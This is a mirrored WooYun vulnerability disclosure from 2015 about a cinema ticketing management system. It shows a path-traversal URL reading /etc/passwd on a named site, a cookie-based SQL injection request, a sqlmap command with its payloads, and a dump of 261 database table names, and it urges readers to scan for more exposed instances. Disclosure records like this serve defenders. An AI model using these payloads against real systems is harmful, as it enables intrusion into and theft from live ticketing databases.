乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-07-31: 厂商已经确认,细节仅向厂商公开 2015-08-03: 细节向第三方安全合作伙伴开放 2015-09-24: 细节向核心白帽子及相关领域专家公开 2015-10-04: 细节向普通白帽子公开 2015-10-14: 细节向实习白帽子公开 2015-10-29: 细节向公众公开
某售票管理系统多个漏洞可影响全国票务
经常去看电影的人会看到,几乎所有影院都在使用“鼎新影院计算机售票管理系统”售票,这是一个全国院线全都采用的售票系统,危害非常大。
百度搜索:鼎新影院计算机售票管理系统。查询到某个影院的系统暴露在互联网。
先来个本地文件读取。
http://yinghezhong.com/?m=../../../../../../../../../../etc/passwd%00
再来一个注入。
GET /?m=login HTTP/1.1Host: yinghezhong.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test*Connection: keep-alivecookie中code为注入参数。sqlmap执行:sqlmap -r http.txt -dbms=mysql --level 4 --dbs
再贴上超大的数据库表。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Cookie #1* ((custom) HEADER) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=-4886' OR (3879=3879)# Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b6271,0x7a695771475a50664a6b,0x71626a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment) Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test' AND 4973=BENCHMARK(5000000,MD5(0x76747570))#---back-end DBMS: MySQL >= 5.0.0Database: cine[261 tables]+----------------------------------------+| card_activity || card_dormancy_wake || card_freeze_log || card_modify_reason || card_quan_log || card_quan_order || card_quan_strategy || card_retail_activity_rule || card_ticket_activity_rule || cinema_api_info || cinema_audio_type || cinema_bank_info || cinema_book_log || cinema_business_date_report || cinema_business_extension || cinema_butie_log || cinema_cancellation_log || cinema_card_active || cinema_card_back || cinema_card_book || cinema_card_cancel || cinema_card_change || cinema_card_consume || cinema_card_consume_area || cinema_card_discount || cinema_card_history_consume || cinema_card_history_recharge || cinema_card_info || cinema_card_jifen || cinema_card_level || cinema_card_lose || cinema_card_preferences || cinema_card_recharge || cinema_card_relation || cinema_card_returned_money || cinema_card_serialnum_modify_log || cinema_card_set || cinema_card_transfer || cinema_card_upgrade || cinema_card_upgrade_log || cinema_cash_config || cinema_cash_ticket || cinema_changqu_info || cinema_common_info || cinema_common_set || cinema_department || cinema_employee_number || cinema_exchange_info || cinema_exchange_relation || cinema_financial_bd_report || cinema_func_modify_log || cinema_gatedeal_info || cinema_gift || cinema_gift_exchange || cinema_gift_type || cinema_group_set || cinema_hall_info || cinema_hall_type || cinema_info || cinema_jifen_strategy || cinema_jifen_strategy_detail || cinema_jifen_ticket_strategy || cinema_lcd_set || cinema_lianchang_sell_log || cinema_lock_log || cinema_lockscreen_log || cinema_lowest_price || cinema_material || cinema_module_info || cinema_module_mapinfo || cinema_movie_cate || cinema_movie_info || cinema_movie_lang_type || cinema_movie_level_info || cinema_movie_publisher || cinema_movie_show || cinema_movie_show_audit || cinema_movie_show_through || cinema_movie_subtitle || cinema_movie_type || cinema_movieplan_log || cinema_notes || cinema_old_card_history || cinema_old_card_map || cinema_old_report || cinema_once_authorize_log || cinema_pay_detail || cinema_pay_detail_vertical || cinema_pay_type || cinema_post_info || cinema_posts_take || cinema_posts_take_info || cinema_posts_take_paper || cinema_preferential_policy || cinema_price_policy || cinema_price_policy_cate || cinema_price_policy_map || cinema_pricepolicy_bind_card || cinema_projector_brand_type || cinema_projector_device_type || cinema_projector_invest_type || cinema_promote_show || cinema_promote_tpl || cinema_property_report || cinema_public_holidays || cinema_pump_money || cinema_quan_barcode_info || cinema_quan_barcode_order || cinema_quan_barcode_order_segment_info || cinema_quan_info || cinema_quan_platform_refund || cinema_quan_retail_relation || cinema_quan_returned || cinema_quan_ticket_relation || cinema_quan_uselog || cinema_ratio_config || cinema_receipt_uselog || cinema_refund_card_type || cinema_refund_log || cinema_refund_order || cinema_refund_order_detail || cinema_refund_retail || cinema_refund_type || cinema_repeat_print_ticket || cinema_reserve_manage || cinema_role_relation_map || cinema_seat || cinema_sell_activity_log || cinema_sell_add || cinema_sell_add_detail || cinema_sell_from || cinema_sell_log || cinema_sell_ratio_map || cinema_service_charge || cinema_service_charge_log || cinema_set || cinema_settlement || cinema_shift_goods || cinema_show_channel || cinema_show_policy_map || cinema_show_seat_status || cinema_show_seat_status_log || cinema_sms_member_condition || cinema_sms_task || cinema_sms_task_log || cinema_sms_task_tpl || cinema_station_template_ticket || cinema_status || cinema_subsidy || cinema_system_monitor_log || cinema_system_notice || cinema_ticket_statistic_report || cinema_ticket_type || cinema_ticketreport || cinema_ticketreport_target_type || cinema_ticketreport_type || cinema_transaction || cinema_transaction_content || cinema_transaction_to_business_map || cinema_unlock_log || cinema_use_ticketpaper_records || cinema_user_active || cinema_user_info || cinema_user_role || cinema_user_selltime_log || cinema_user_set || cinema_version || cinema_vip_card || cinema_webbuy_set || cinema_work_station || cinema_work_station_group || cinema_work_station_printer || cinema_yushouquan_book || cinema_yushouquan_flow || cinema_yushouquan_info || cinema_yushouquan_info_ex || cinema_yushouquan_log || cinema_yushouquan_policy || cinema_zzplatform_rows_report || cinema_zzplatform_transaction || client_report_condition_set || client_report_usage_exception || client_report_usage_log || client_reports_info || client_version || movie_publisher || nc_financial_report || nc_merchant || nc_merchant_relation_map || retail_activity_info || retail_activity_rule || retail_autosell_goods || retail_basic_unit_setting || retail_brands || retail_cate_discount || retail_categories_son || retail_categories_treepaths || retail_category_shelf_relation || retail_exchange_info || retail_fine_cash || retail_fine_glasses || retail_fine_goods || retail_fine_goods_info || retail_goods_categories || retail_goods_damage || retail_goods_dispatch || retail_goods_material || retail_goods_returns || retail_goods_settlement || retail_goods_storage || retail_goods_storage_list || retail_inventory_info || retail_inventory_temp || retail_kesu_goods || retail_kesu_package || retail_kesu_settlement || retail_mcard_policy || retail_mwac || retail_officesupplies_uselog || retail_package_info || retail_purchase_agreement || retail_purchase_agreement_goods || retail_purchase_order || retail_purchase_order_goods || retail_sell_goods_formula || retail_sell_goods_info || retail_sell_log || retail_sell_package_info || retail_sell_settlement || retail_shelf_setting || retail_single_discount || retail_single_goods || retail_storage_batch || retail_storage_log || retail_supplier_setting || retail_transfer_batch || retail_user_shelf || retail_user_store || retail_wac || retail_warehouse_setting || schedule_applicant_info || schedule_liuban_info || schedule_plan_detail || schedule_plan_info || schedule_store_info || schedule_workhours_estimate || schedule_workhours_standard || sell_commission_set || sessions || system_const_val_map || system_runtime_variables || system_task || system_trans_failed || system_trans_rollback || system_update_info || system_variable_val_map || ticket_retail_associate_log || unique_flags || universal_request_records || voice_call_records || web_partner_key |+----------------------------------------+
再补充2个在google和baidu能搜索到的,暴露在互联网的案例。
互联网暴露的就只能提供这么多了,想找更多请自己跑cn段去慢慢找
危害等级:中
漏洞Rank:10
确认时间:2015-07-31 20:32
对于您提出的问题我们已通知业务人员启动排查,感谢您的关注和支持
暂无